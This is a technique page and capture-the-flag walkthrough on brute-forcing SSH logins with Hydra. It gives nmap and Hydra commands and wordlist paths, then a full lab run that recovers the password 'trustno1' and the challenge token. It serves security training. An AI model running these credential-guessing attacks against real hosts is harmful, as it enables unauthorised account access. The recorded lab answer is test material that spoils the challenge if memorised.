SSH Brute Force

Table of Contents

• SSH Brute Force
  • Table of Contents
  • Overview
  • Workflow
    • Step 1 — Confirm SSH Is Available
    • Step 2 — Gather Username Hints
    • Step 3 — Brute Force with Hydra
      • Hydra Parameters Quick Reference
      • Single Username, Wordlist Password Attack
      • Recommended Options
      • Common Wordlists on Kali
      • Example Output
    • Step 4 — Connect with Recovered Credentials
  • Full Example
    • Challenge
    • Port and Service Discovery
    • Attempt Login With a Generic User
    • Let's Look Around for Additional Information
    • Brute Force Attack
    • Connect to Target System
    • Answer
  • References

---

Overview

Technique for gaining SSH access to a target by brute-forcing credentials using a wordlist. The primary tool covered here is Hydra, which supports parallelized login attempts across many protocols including SSH.

---

Workflow

1. Identify SSH — confirm port 22 is open via Nmap
2. Gather hints — probe the target for username clues (banner messages, wordlists, file names)
3. Brute force — run Hydra with a known or discovered username against a wordlist
4. Connect — use the recovered credentials to log in via SSH

---

Step 1 — Confirm SSH Is Available

nmap -sS -sV -p 22 TARGET_IP

# Or scan all ports to catch SSH on non-standard ports
nmap -sS -sV -p- TARGET_IP

Expected output when SSH is present:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9

---

Step 2 — Gather Username Hints

Before brute-forcing, try connecting with a dummy username. SSH banner messages sometimes reveal the expected username or other useful information:

ssh dummy@TARGET_IP

Example banner response:

This system is reserved only for john and friends. If you are not a friend, please leave!

Also look for hints on the attack host ,custom wordlists named after a user, files referencing usernames, or challenge descriptions:

# Check for wordlists on the local machine
ls /usr/share/wordlists/

---

Step 3 — Brute Force with Hydra

Hydra Parameters Quick Reference

Option	Description
-l USERNAME	Single username
-L FILE	Username list from file
-p PASSWORD	Single password
-P FILE	Password list from file
-t N	Number of parallel tasks (default 16; use 4 for SSH)
-s PORT	Target port (default for SSH: 22)
-v	Verbose output
-V	Show each login attempt
-f	Stop after first valid credential found

Single Username, Wordlist Password Attack

hydra -l USERNAME -P /path/to/wordlist.txt ssh://TARGET_IP

Recommended Options

# Reduce parallel tasks to avoid SSH connection limits (recommended for SSH)
hydra -l USERNAME -P /path/to/wordlist.txt -t 4 ssh://TARGET_IP

# Specify port explicitly if SSH is on a non-standard port
hydra -l USERNAME -P /path/to/wordlist.txt -s PORT ssh://TARGET_IP

# Try multiple usernames from a file
hydra -L usernames.txt -P /path/to/wordlist.txt -t 4 ssh://TARGET_IP

Note

Many SSH servers limit the number of concurrent authentication attempts. Hydra will warn about this. Use -t 4 to reduce parallel tasks and avoid being rate-limited or locked out.

Common Wordlists on Kali

/usr/share/wordlists/rockyou.txt          # General passwords — most common CTF choice
/usr/share/wordlists/metasploit/          # Metasploit-bundled wordlists
/usr/share/wordlists/john.lst             # John the Ripper default list
/usr/share/seclists/Passwords/            # SecLists password collections

Example Output

[DATA] attacking ssh://TARGET_IP:22/
[22][ssh] host: TARGET_IP   login: john   password: trustno1
1 of 1 target successfully completed, 1 valid password found

---

Step 4 — Connect with Recovered Credentials

ssh USERNAME@TARGET_IP

On first connection to an unknown host, SSH will ask you to confirm the host fingerprint:

The authenticity of host 'TARGET_IP' can't be established.
ED25519 key fingerprint is SHA256:xxxx...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Type yes to add the host to ~/.ssh/known_hosts and proceed.

---

Full Example

Challenge

What is the user token found in the user's home folder in token.txt on Target 2?

• Local Host IP address is 10.102.53.159.
• Target 2 IP address is 10.102.62.88.

Port and Service Discovery

Execute nmap to find out any ports or serviced available:

$ sudo nmap -sS -sV -p- 10.102.62.88

Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-11 02:50 UTC
Nmap scan report for ip-10-102-62-88.eu-west-1.compute.internal (10.102.62.88)
Host is up (0.000014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds

It looks like SSH is available on the standard port 22.

Attempt Login With a Generic User

Attempting to login using admin as a username shows an interesting message.

$ ssh admin@10.102.62.88

The authenticity of host '10.102.62.88 (10.102.62.88)' can't be established.
ED25519 key fingerprint is SHA256:pHZzV4YBg+dZ9wT/hDzq3v2nJLdCVW3J+YoRUmFpaQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.102.62.88' (ED25519) to the list of known hosts.
This system is reserved only for john and friends. If you are not a friend, please leave!
admin@10.102.62.88's password:

Let's Look Around for Additional Information

There is a custom wordlist named john.lst:

$ ls -asl /usr/share/wordlists/john.lst 
4 -rw-r--r-- 1 root root 2077 Feb 11 02:48 /usr/share/wordlists/john.lst

Brute Force Attack

Let's try hydra to enumerate for SSH password guessing with the username john:

$ hydra -l john -P /usr/share/wordlists/john.lst ssh://10.102.62.88

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 03:11:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:1/p:200), ~13 tries per task
[DATA] attacking ssh://10.102.62.88:22/
[22][ssh] host: 10.102.62.88   login: john   password: trustno1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 03:11:53

We found the following credentials:

login: john   password: trustno1

Connect to Target System

Now that we found the credentials, let's connect and see what's available:

$ ssh john@10.102.62.88

This system is reserved only for john and friends. If you are not a friend, please leave!
john@10.102.62.88's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.10.223-212.873.amzn2.x86_64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

john@linux-challenge-2:~$ ls -asl
total 16
0 drwxr-xr-x 1 john john   88 Feb 11 03:11 .
0 drwxr-xr-x 1 root root   18 Oct 12  2023 ..
4 -rw-r--r-- 1 john john  220 Feb 25  2020 .bash_logout
4 -rw-r--r-- 1 john john 3771 Feb 25  2020 .bashrc
0 drwx------ 2 john john   34 Feb 11 03:11 .cache
4 -rw-r--r-- 1 john john  807 Feb 25  2020 .profile
4 -rw-r--r-- 1 root root    7 Feb 11 02:48 token.txt
john@linux-challenge-2:~$ cat token.txt
b2d61a
john@linux-challenge-2:~$ 

Answer

The user token is b2d61a.

---

References

• Hydra on GitHub
• HackTricks — Brute Force SSH
• SecLists — Password Wordlists